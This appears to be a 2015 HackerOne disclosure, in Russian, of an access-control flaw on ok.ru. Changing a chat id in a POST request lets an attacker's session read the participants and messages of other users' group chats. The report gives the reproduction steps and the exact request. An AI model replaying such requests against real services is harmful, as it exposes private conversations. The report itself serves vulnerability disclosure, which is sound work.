ok.ru: Доступ к чужим групповым беседам.

2015-07-27T15:03:58
ID H1:79046
Type hackerone
Reporter 4lemon
Modified 2016-04-29T09:59:15

Description

  1. В аккаунте жертвы сделем групповой чат, в который не входит атакующий
  2. Запомним параметр d.chi:64052989157445
  3. Из сессии атакующего сделаем запрос информации о беседе.

> POST /settings/feed/apps?cmd=ToolbarMessages&gwt.requested=129bff65&st.cmd=userConfigFeed&st.type=2&p_sId=758860922374599189 HTTP/1.1

> tlb.act=act.rci&d.chi=64052989157445&d.coi=555409084413&d.wh=544&refId=mrcc-1438008870180

Получаем всю информацию о беседе: - участники - сообщения